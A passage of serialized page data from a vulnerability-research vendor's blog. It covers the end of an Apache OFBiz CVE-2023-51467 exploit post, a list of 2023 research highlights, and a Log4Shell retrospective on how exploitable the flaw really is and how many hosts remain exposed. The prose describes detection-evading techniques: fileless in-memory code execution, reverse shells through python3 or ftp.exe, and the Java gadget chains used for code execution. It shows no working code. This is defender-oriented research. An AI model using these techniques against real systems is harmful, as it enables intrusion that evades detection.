Nashorn","\u002Fblog\u002Fofbiz-cve-2023-51467\u002Fprocess-spawn.png",[18,83307,83308],{},"But it’s still better than dropping Meterpreter on disk. That’ll only make Defender (or whoever) mad.",[18,83310,83311],{},"On the wire, this exploit is not subtle.",[18,83313,83314],{},[68,83315],{":width":10862,"alt":83316,"src":83317},"Exploit on the wire","\u002Fblog\u002Fofbiz-cve-2023-51467\u002Fcve-2023-51467-wireshark.png",[18,83319,83320],{},"It does have one thing going for it, though: OFBiz installs typically use TLS so unless someone is decrypting the traffic, network detections are far less of a concern.",[61,83322,1903],{"id":1902},[18,83324,83325,83326,83330,83331,83333],{},"OFBiz is not widely popular, but it has been exploited in the past. There is a fair deal of hype around CVE-2023-51467 but no public weaponized payload, which called into question if it was even possible. We’ve concluded that not only is it possible, but we can achieve arbitrary in memory code execution. VulnCheck has ",[47,83327,83329],{"href":82826,"rel":83328},[51],"shared"," a public exploit that will hopefully aid defenders in diagnosing what ",[1131,83332,70230],{}," attacks look like.",[61,83335,202],{"id":201},[18,83337,83338,83339,1246,83342,1255,83345,65315,83350,982,83353,63288],{},"The VulnCheck Initial Access team is always looking to advance the state of attack on initial access vulnerabilities like CVE-2023-51467. For more research like this, see our blogs, ",[47,83340,40447],{"href":53829,"rel":83341},[51],[47,83343,55229],{"href":53837,"rel":83344},[51],[47,83346,83349],{"href":83347,"rel":83348},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fcve-2023-44604-activemq-in-memory",[51],"Executing from Memory Using ActiveMQ CVE-2023-46604",[47,83351,1245],{"href":45535,"rel":83352},[51],[47,83354,216],{"href":214,"rel":83355},[51],[2901,83357,83358],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .shWJe, html code.shiki .shWJe{--shiki-light:#F76D47;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sAzHV, html code.shiki .sAzHV{--shiki-light:#9C3EDA;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F92672}html pre.shiki code .sW3yT, html code.shiki .sW3yT{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F92672}html pre.shiki code .sSsL9, html code.shiki .sSsL9{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .syw9h, html code.shiki .syw9h{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#24292E;--shiki-default-font-style:inherit;--shiki-dark:#E1E4E8;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sTNss, html code.shiki .sTNss{--shiki-light:#9C3EDA;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .sYoWi, html code.shiki .sYoWi{--shiki-light:#E53935;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .slF1C, html code.shiki .slF1C{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#F92672}html pre.shiki code .s-euU, html code.shiki .s-euU{--shiki-light:#90A4AE;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#F8F8F2}",{"title":219,"searchDepth":220,"depth":220,"links":83360},[83361,83362,83363,83364,83365,83366,83367,83368],{"id":11647,"depth":220,"text":11648},{"id":82219,"depth":220,"text":82220},{"id":82269,"depth":220,"text":82270},{"id":82318,"depth":220,"text":82319},{"id":82463,"depth":220,"text":82464},{"id":82637,"depth":220,"text":82638},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"VulnCheck bypasses the Apache OFBiz Groovy sandbox to land a memory resident reverse shell.",{"slug":83371},"ofbiz-cve-2023-51467","\u002Fblog\u002Fofbiz-cve-2023-51467",{"title":58272,"description":83369},"blog\u002Fofbiz-cve-2023-51467",[242],"vlfhx2Mnh4bH1GLKOawwM-KXG0xe-8NVDFcFx5UtE80",{"id":83378,"title":83379,"articles":7,"authors":83380,"body":83382,"date":83575,"description":83576,"extension":234,"image":7,"link":7,"meta":83577,"navigation":237,"path":83579,"seo":83580,"series":7,"stem":83581,"subtype":7,"tags":7,"__hash__":83582},"blog\u002Fblog\u002Ftop-10-2023.md","Top 10 VulnCheck Research Blogs of 2023",[83381],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":83383,"toc":83557},[83384,83387,83394,83397,83401,83404,83408,83414,83418,83429,83433,83441,83445,83453,83457,83471,83475,83483,83487,83490,83494,83502,83506,83519,83523,83531,83535,83543,83545,83548,83550],[18,83385,83386],{},"As we head into 2024, we're looking back at the interesting vulnerability research that VulnCheck published throughout 2023. Over the last year, we’ve shared a range of impactful research, but our favorite research falls into one of two camps:",[1789,83388,83389,83392],{},[25,83390,83391],{},"Novel or new exploitation",[25,83393,25142],{},[18,83395,83396],{},"With our last blog of 2023, we highlight the top 10 VulnCheck research blogs that fall into those categories and describe why we believe they were, and still are, impactful.",[61,83398,83400],{"id":83399},"novel-or-new-exploitation","Novel or New Exploitation",[18,83402,83403],{},"The security community often relies on researchers to develop proof of concept exploits. Defenders use these exploits to help implement appropriate countermeasures. In this group of blogs, VulnCheck developed new exploits and exploitation methods that changed how defenders protected their networks.",[993,83405,83407],{"id":83406},"_1-executing-from-memory-using-activemq-cve-2023-46604","1. Executing from Memory Using ActiveMQ CVE-2023-46604",[18,83409,58229,83410,83413],{},[47,83411,83349],{"href":83347,"rel":83412},[51],", VulnCheck introduced a new method of exploiting CVE-2023-46604 that allowed attackers to execute arbitrary code without touching the filesystem or executing external programs, thereby avoiding detections.",[993,83415,83417],{"id":83416},"_2-fileless-remote-code-execution-on-juniper-firewalls","2. Fileless Remote Code Execution on Juniper Firewalls",[18,83419,58229,83420,83423,83424,83428],{},[47,83421,35931],{"href":53837,"rel":83422},[51],", VulnCheck introduced a new method of exploiting CVE-2023-36845 that, again, allowed attackers to execute arbitrary code without touching the filesystem or executing external programs. We also published a ",[47,83425,69399],{"href":83426,"rel":83427},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-36845-scanner",[51]," and found that, at the time, 80% of Juniper routers remained unpatched.",[993,83430,83432],{"id":83431},"_3-exploitation-of-openfire-cve-2023-32315","3. Exploitation of Openfire CVE-2023-32315",[18,83434,58229,83435,83440],{},[47,83436,83439],{"href":83437,"rel":83438},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fopenfire-cve-2023-32315",[51],"Exploitation of Openfire CVE-2023-32315",", VulnCheck introduced a new method of exploiting CVE-2023-32315 that avoided creating a new user, another technique to avoid detection. We also shared that around half of internet-facing Openfire instances remained vulnerable. Finally, we shared Suricata rules that would detect our novel exploitation techniques.",[993,83442,83444],{"id":83443},"_4-exploiting-mikrotik-routeros-hardware-with-cve-2023-30799","4. Exploiting MikroTik RouterOS Hardware with CVE-2023-30799",[18,83446,58229,83447,83452],{},[47,83448,83451],{"href":83449,"rel":83450},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fmikrotik-foisted-revisited",[51],"Exploiting MikroTik RouterOS Hardware with CVE-2023-30799",", VulnCheck shares details on the development of an exploit for CVE-2023-30799 affecting MikroTik routers. At the time of publication, more than 900,000 routers were vulnerable.",[993,83454,83456],{"id":83455},"_5-papercut-exploitation-a-different-path-to-code-execution","5. PaperCut Exploitation - A Different Path to Code Execution",[18,83458,58229,83459,83463,83464,83466,83467,83470],{},[47,83460,83462],{"href":53829,"rel":83461},[51],"PaperCut Exploitation - A Different Path to Code Execution",", VulnCheck shared a different exploitation for CVE-2023-27350. VulnCheck found a new HTTP endpoint to trigger code execution, and instead of using ",[886,83465,82664],{}," like others, we used python3 (Linux) and ",[886,83468,83469],{},"ftp.exe"," (Windows) to establish a reverse shell. We also shared proof of concept code and Suricata rules to detect the new attack.",[993,83472,83474],{"id":83473},"_6-a-different-payload-for-cve-2022-47966","6. A Different Payload for CVE-2022-47966",[18,83476,58229,83477,83482],{},[47,83478,83481],{"href":83479,"rel":83480},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fcve-2022-47966-payload",[51],"A Different Payload for CVE-2022-47966",", VulnCheck once again demonstrated a new memory-resident attack, this time for CVE-2022-47966 affecting a wide range of ManageEngine products. VulnCheck also examined some good (and bad!) public detections for CVE-2022-47966.",[61,83484,83486],{"id":83485},"intel-on-exploitation-in-the-wild","Intel on Exploitation in the Wild",[18,83488,83489],{},"Exploitation in the wild is probably the most important topic for the security community. In the following blogs, VulnCheck discovered exploitation in the wild or assessed the likelihood of exploitation in the wild.",[993,83491,83493],{"id":83492},"_7-exposing-rocketmq-cve-2023-33246-payloads","7. Exposing RocketMQ CVE-2023-33246 Payloads",[18,83495,58229,83496,83501],{},[47,83497,83500],{"href":83498,"rel":83499},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Frocketmq-exploit-payloads",[51],"Exposing RocketMQ CVE-2023-33246 Payloads",", VulnCheck was able to extract exploit payloads from exploited hosts on the internet. The result was the ability to identify multiple attackers and their unique approaches to exploitation. This blog pre-dated CVE-2023-33246’s inclusion on the CISA KEV list.",[993,83503,83505],{"id":83504},"_8-widespread-cisco-ios-xe-implants-in-the-wild","8. Widespread Cisco IOS XE Implants in the Wild",[18,83507,58229,83508,83512,83513,83518],{},[47,83509,83511],{"href":41716,"rel":83510},[51],"Widespread Cisco IOS XE Implants in the Wild",", VulnCheck broke the news that there were thousands of implanted Cisco IOS XE devices on the internet. We also shared the ",[47,83514,83517],{"href":83515,"rel":83516},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcisco-ios-xe-implant-scanner",[51],"scanner"," we used to scan the internet.",[993,83520,83522],{"id":83521},"_9-assessing-potential-exploitation-of-sophos-firewall-and-cve-2022-3236","9. Assessing Potential Exploitation of Sophos Firewall and CVE-2022-3236",[18,83524,58229,83525,83530],{},[47,83526,83529],{"href":83527,"rel":83528},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fsophos-cve-2022-3236",[51],"Assessing Potential Exploitation of Sophos Firewall and CVE-2022-3236",", VulnCheck is the first to publish exploit details for CVE-2022-3236, and, after a scan of the internet, explain why the firewall is highly unlikely to be a mass-exploitation target.",[993,83532,83534],{"id":83533},"_10-looking-for-cve-2023-43261-in-the-real-world","10. Looking for CVE-2023-43261 in the Real World",[18,83536,58229,83537,83542],{},[47,83538,83541],{"href":83539,"rel":83540},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Freal-world-cve-2023-43261",[51],"Looking for CVE-2023-43261 in the Real World",", VulnCheck found evidence that cellular routers, often used in ICS networks, affected by CVE-2023-43261 had been widely exploited in the wild. We also discovered that the CVE description did not accurately describe all the affected models and versions.",[61,83544,1903],{"id":1902},[18,83546,83547],{},"2023 was a wild year for vulnerabilities and exploitation. Hopefully, our research and insights had a positive impact on the community. Happy holidays! You’ll see many new payloads from us next year.",[61,83549,202],{"id":201},[18,83551,83552,83553,83556],{},"Are you interested in the vulnerabilities that actually matter? Do you want to track the vulnerabilities attackers are exploiting in the wild? If so, VulnCheck's ",[47,83554,216],{"href":214,"rel":83555},[51]," is for you. Register and demo our data today.",{"title":219,"searchDepth":220,"depth":220,"links":83558},[83559,83567,83573,83574],{"id":83399,"depth":220,"text":83400,"children":83560},[83561,83562,83563,83564,83565,83566],{"id":83406,"depth":1266,"text":83407},{"id":83416,"depth":1266,"text":83417},{"id":83431,"depth":1266,"text":83432},{"id":83443,"depth":1266,"text":83444},{"id":83455,"depth":1266,"text":83456},{"id":83473,"depth":1266,"text":83474},{"id":83485,"depth":220,"text":83486,"children":83568},[83569,83570,83571,83572],{"id":83492,"depth":1266,"text":83493},{"id":83504,"depth":1266,"text":83505},{"id":83521,"depth":1266,"text":83522},{"id":83533,"depth":1266,"text":83534},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2023-12-26","In our last blog of 2023, we highlight the top 10 VulnCheck research blogs that explored new exploit techniques or exploitation in the wild.",{"slug":83578},"top-10-2023","\u002Fblog\u002Ftop-10-2023",{"title":83379,"description":83576},"blog\u002Ftop-10-2023","NXLNkg3OP7GYLJm_pnJCc4SA2_8gDijZbK3YFB7mxw0",{"id":83584,"title":83585,"articles":83586,"authors":83599,"body":83601,"date":83590,"description":83918,"extension":234,"image":7,"link":7,"meta":83919,"navigation":237,"path":83921,"seo":83922,"series":7,"stem":83923,"subtype":7,"tags":83924,"__hash__":83925},"blog\u002Fblog\u002Flog4shell-retro.md","A Log4Shell Retrospective - Overblown and Exaggerated",[83587,83591,83595],{"title":83588,"source":39566,"link":83589,"date":83590},"Security-by-design and software supply chains.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F239","2023-12-18",{"title":83592,"source":57680,"link":83593,"date":83594},"Impact of Log4Shell Bug Was Overblown, Say Researchers","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fimpact-log4shell-overblown\u002F","2023-12-19",{"title":83596,"source":3494,"link":83597,"date":83598},"Risky Biz News: FBI disrupts AlphV\u002FBlackCat ransomware;","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-fbi-disrupts-alphvblackcat","2023-12-20",[83600],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":83602,"toc":83912},[83603,83617,83620,83624,83638,83641,83679,83688,83691,83694,83708,83711,83804,83807,83811,83824,83829,83833,83848,83851,83856,83859,83865,83872,83874,83902,83905,83907],[1925,83604,83605,83608],{},[18,83606,83607],{},"“It is by far the single biggest, most critical vulnerability ever.”",[22,83609,83610],{},[25,83611,83612],{},[47,83613,83616],{"href":83614,"rel":83615},"https:\u002F\u002Fwww.wired.com\u002Fstory\u002Flog4j-log4shell-vulnerability-ransomware-second-wave\u002F",[51],"Amit Yoran",[263,83618],{":list":83619,"ico":266,"title":83585},"[\"At the time Log4Shell emerged, only a small subset of software that used the vulnerable log4j libraries were vulnerable to remote code execution.\",\"The current footprint of internet-facing software that is potentially vulnerable to code execution via Log4Shell is approximately 125,000 hosts.\",\"Of the 125,000 hosts, approximately 95% are using known patched versions.\",\"Although many predicted a long tail of exploitation, two years after disclosure there are very few remaining Log4Shell initial access targets.\"]",[61,83621,83623],{"id":83622},"exploitability-is-the-only-thing-that-matters","Exploitability is the only thing that matters",[18,83625,83626,83627,83631,83632,83637],{},"Two years ago, ",[47,83628,61923],{"href":83629,"rel":83630},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-44228",[51]," sent the security industry into a panic. The vulnerability, better known as ",[47,83633,83636],{"href":83634,"rel":83635},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FLog4Shell",[51],"Log4Shell",", had security professionals working overtime through the holidays hunting down vulnerable log4j libraries. At the time, there was fear and confusion around what software was affected, which were exploitable, and where attackers would attack next.",[18,83639,83640],{},"The reality was that – at the time – very few products using the vulnerable log4j libraries were remotely exploitable for code execution. Two years after disclosure, we believe the following list is the majority of products that were remotely exploitable using Log4Shell (we left off Minecraft, because it’s a game, and a few lesser known products that we couldn’t confirm code execution against):",[22,83642,83643,83646,83649,83652,83655,83658,83661,83664,83667,83670,83673,83676],{},[25,83644,83645],{},"Apache Druid",[25,83647,83648],{},"Apache James",[25,83650,83651],{},"Apache JSPWiki",[25,83653,83654],{},"Apache OFbiz",[25,83656,83657],{},"Apache Skywalking",[25,83659,83660],{},"Apache Solr",[25,83662,83663],{},"Apache Struts2",[25,83665,83666],{},"Ivanti MobileIron",[25,83668,83669],{},"ManageEngine ADManager",[25,83671,83672],{},"Ubiquiti UniFi Controller",[25,83674,83675],{},"VMware Horizon",[25,83677,83678],{},"VMware vCenter",[18,83680,83681,83682,83687],{},"Many security companies will make a big deal about the ",[47,83683,83686],{"href":83684,"rel":83685},"https:\u002F\u002Fwww.sonatype.com\u002Fresources\u002Flog4j-vulnerability-resource-center",[51],"300 million+ downloads"," of vulnerable log4j libraries over the last two years. The idea being, a lot of projects are vulnerable because they use the vulnerable library. That’s not right though.",[18,83689,83690],{},"The reality is the short list above is the set of actually exploitable software, and only a subset of those products have been linked to exploitation in the wild. VulnCheck currently associates Log4Shell exploitation with 40 APT, ransomware groups, and\u002For botnets, but only four of the products above are associated with those attacks: MobileIron, Ubiquiti UniFi Controller, VMware Horizon, and VMware vCenter.",[18,83692,83693],{},"Maybe there are tens of thousands of projects that depend on vulnerable log4j libraries, but of those tens of thousands of projects only these four products are tied to actual exploitation in the wild. That’s largely because exploitation of Log4Shell for code execution is much more complicated than just finding victims that use the vulnerable library.",[18,83695,83696,83697,83701,83702,83704,83705,83707],{},"Log4Shell is a two stage attack. The first stage triggers a connection to an attacker-controlled server when an attacker-controlled string is logged by the victim software. Almost every exploit that we index in ",[47,83698,83700],{"href":74248,"rel":83699},[51],"VulnCheck XDB"," stops here. But it’s important to realize that completing the first stage ",[1131,83703,11536],{}," achieve code execution. For code execution (the second stage), the attacker-controlled server must provide ",[1131,83706,15523],{}," code for the victim to execute. This is a non-trivial task in Java, and requires using dependencies and serialized gadgets that may not work against the victim software.",[18,83709,83710],{},"For example, VulnCheck-developed Log4Shell exploits use the following gadgets to achieve code execution:",[307,83712,83713,83722],{},[310,83714,83715],{},[313,83716,83717,83719],{},[316,83718,3584],{},[316,83720,83721],{},"RCE Gadget",[336,83723,83724,83735,83744,83755,83765,83776,83785,83795],{},[313,83725,83726,83728],{},[341,83727,83645],{},[341,83729,83730],{},[47,83731,83734],{"href":83732,"rel":83733},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F3df992d393864c6bfc38a59a9831f89df19f8b46\u002Fjava\u002Fldapjndi\u002Fldapjndi.go#L411",[51],"Commons Beanutils",[313,83736,83737,83739],{},[341,83738,83648],{},[341,83740,83741],{},[47,83742,83734],{"href":83732,"rel":83743},[51],[313,83745,83746,83748],{},[341,83747,83651],{},[341,83749,83750],{},[47,83751,83754],{"href":83752,"rel":83753},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F3df992d393864c6bfc38a59a9831f89df19f8b46\u002Fjava\u002Fldapjndi\u002Fldapjndi.go#L277",[51],"Tomcat BeanFactory",[313,83756,83757,83760],{},[341,83758,83759],{},"MobileIron",[341,83761,83762],{},[47,83763,83734],{"href":83732,"rel":83764},[51],[313,83766,83767,83770],{},[341,83768,83769],{},"Apache OFBiz",[341,83771,83772],{},[47,83773,82308],{"href":83774,"rel":83775},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F3df992d393864c6bfc38a59a9831f89df19f8b46\u002Fjava\u002Fldapjndi\u002Fldapjndi.go#L347",[51],[313,83777,83778,83780],{},[341,83779,83663],{},[341,83781,83782],{},[47,83783,83754],{"href":83752,"rel":83784},[51],[313,83786,83787,83790],{},[341,83788,83789],{},"Ubiquiti Unifi Controller",[341,83791,83792],{},[47,83793,83754],{"href":83752,"rel":83794},[51],[313,83796,83797,83799],{},[341,83798,83675],{},[341,83800,83801],{},[47,83802,83754],{"href":83752,"rel":83803},[51],[18,83805,83806],{},"Each product is vulnerable to a different set of Java gadgets and some encountered products won’t be vulnerable to any. Exploitation for code execution using Log4Shell, even after exploiting the first stage, is not guaranteed. Your favorite clout chaser on Twitter may claim their Log4Shell canary token is triggered by sending a JNDI string through email, but they have not proven anything when it comes to actual code execution. Landing Log4Shell for code execution is complicated and that’s why real world exploitation has been limited to so few products.",[61,83808,83810],{"id":83809},"very-few-log4shell-targets-remain","Very few Log4Shell targets remain",[18,83812,83813,83814,83819,83820,83823],{},"New reports of Log4Shell exploitation have surfaced as recently as December 11, 2023. ",[47,83815,83818],{"href":83816,"rel":83817},"https:\u002F\u002Fblog.talosintelligence.com\u002Flazarus_new_rats_dlang_and_telegram\u002F",[51],"Cisco Talos"," tied a recent ",[47,83821,81372],{"href":81370,"rel":83822},[51]," campaign to Log4Shell exploitation against VMware Horizon (See?). It begs the question, “After two years, what is the internet footprint of the products that are known to be exploitable by Log4Shell?” At VulnCheck we actually track this and as of December 7, 2023 there were ~125,000 hosts that hosted software that was potentially vulnerable to Log4Shell. What we mean by “potentially vulnerable” is that the software was known to be exploitable for code execution at some time (e.g. VMware Horizon).",[1925,83825,83826],{},[18,83827,83828],{},"Internet-Facing Software Potentially Vulnerable to Log4Shell (December 7, 2023)",[11128,83830],{":labels":83831,":values":83832},"[\"Apache Druid\",\"Apache James (POP3)\",\"Apache James (SMTP)\",\"Apache JSPWiki\",\"Apache OFbiz\",\"Apache Skywalking\",\"Apache Solr\",\"Apache Struts2\",\"Ivanti MobileIron\",\"ManageEngine ADManager\",\"Ubiquiti UniFi Controller\",\"VMware Horizon\",\"VMware Vcenter\"]","[335,508,1154,33,900,307,1065,1067,135,409,94165,22298,1900]",[18,83834,83835,83836,83841,83842,83847],{},"125,000 hosts is a decent pool of potential victims, but it isn’t really that many. Just to understand the scale of things on the internet: there are approximately 30x more ",[47,83837,83840],{"href":83838,"rel":83839},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22%2Fdoc%2Fpage%2Flogin.asp%3F_%22",[51],"Hikvision cameras"," and 300x more ",[47,83843,83846],{"href":83844,"rel":83845},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=server%3A+nginx",[51],"nginx servers"," on the internet. 125,000 is a drop in the sea.",[18,83849,83850],{},"Additionally, very few of those 125,000 hosts are currently vulnerable to Log4Shell. Using VulnCheck developed version scanners we examined the installed versions of the internet-facing software and we found ~94% of the hosts are patched against Log4Shell.",[1925,83852,83853],{},[18,83854,83855],{},"Internet-Facing Software Potentially Vulnerable to Log4Shell (Post Version Scan)",[11128,83857],{":labels":83831,":values":83858},"[18,343,664,25,900,1,377,1067,72,22,1515,1973,610]",[18,83860,83861,83862,83864],{},"That leaves just 7,000 ",[295,83863,10300],{}," hosts. With an emphasis on potentially because some of the software have undiscoverable versions (Apache James 3+, OFBiz, and Struts2). Additionally, Apache Solr typically (but not always) has authentication enabled, making it a poor initial access target. It’s also difficult to fingerprint the number of the remaining hosts that are honeypots, but we assume it’s a measurable amount.",[18,83866,83867,83868,83871],{},"The number of ",[295,83869,83870],{},"actually vulnerable"," hosts is probably half as many, given the caveats listed above. Which means the security community has done a decent job of cleaning up after this particular vulnerability. There do appear to be some remaining targets (and we’ll likely continue to see reports like Cisco Talos’ recent Lazarus writeup), but the possibility for widespread exploitation is clearly declining overall, and the tail-end is coming to a close as well. Soon, Log4Shell should become a distant memory.",[61,83873,1903],{"id":1902},[18,83875,83876,83877,83881,83882,83886,83887,83891,83892,982,83897,27987],{},"Log4Shell was described as “the single biggest, most critical vulnerability ever”, but in actuality we see multiple vulnerabilities with a similar impact every year (Fortinet ",[47,83878,61739],{"href":83879,"rel":83880},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-27997",[51],", Cisco ",[47,83883,61831],{"href":83884,"rel":83885},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-20198",[51],", and Citrix ",[47,83888,61762],{"href":83889,"rel":83890},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-3519",[51]," all had comparable impact in 2023). Log4Shell never had an overwhelming amount of internet-facing targets, and, because of a strong effort by the security community, very few exploitable targets remain. The king of vulnerabilities remains Eternal Blue whose financial impact remains breath-taking almost eight years later (see ",[47,83893,83896],{"href":83894,"rel":83895},"https:\u002F\u002Fwww.wired.com\u002Fstory\u002Fnotpetya-cyberattack-ukraine-russia-code-crashed-the-world\u002F",[51],"Maersk",[47,83898,83901],{"href":83899,"rel":83900},"https:\u002F\u002Fwww.wsj.com\u002Farticles\u002Fmercks-insurers-on-the-hook-in-1-4-billion-notpetya-attack-court-says-528aeb01",[51],"Merck",[18,83903,83904],{},"Log4Shell has an interesting place in security history because it accelerated the conversation around Software Supply Chain Security & SBOM. But the impact of the vulnerability itself was, and still is, overblown and exaggerated.",[61,83906,202],{"id":201},[18,83908,83552,83909,83556],{},[47,83910,216],{"href":214,"rel":83911},[51],{"title":219,"searchDepth":220,"depth":220,"links":83913},[83914,83915,83916,83917],{"id":83622,"depth":220,"text":83623},{"id":83809,"depth":220,"text":83810},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"Log4Shell was proclaimed one of the most critical vulnerabilities, but in this blog, VulnCheck challenges that perspective, revealing the limited number of vulnerable systems still present two years after the initial disclosure.",{"slug":83920},"log4shell-retro","\u002Fblog\u002Flog4shell-retro",{"title":83585,"description":83918},"blog\u002Flog4shell-retro",[242],"0Ezft1hpVtbH-t76E7374fzEmzF1e01hjlNWE_-AC94",{"id":83927,"title":83928,"articles":7,"authors":83929,"body":83931,"date":84025,"description":83935,"extension":234,"image":7,"link":7,"meta":84026,"navigation":237,"path":84028,"seo":84029,"series":7,"stem":84030,"subtype":7,"tags":84031,"__hash__":84032},"blog\u002Fblog\u002Fnvd-why.md","Why We Are Open-Sourcing NVD 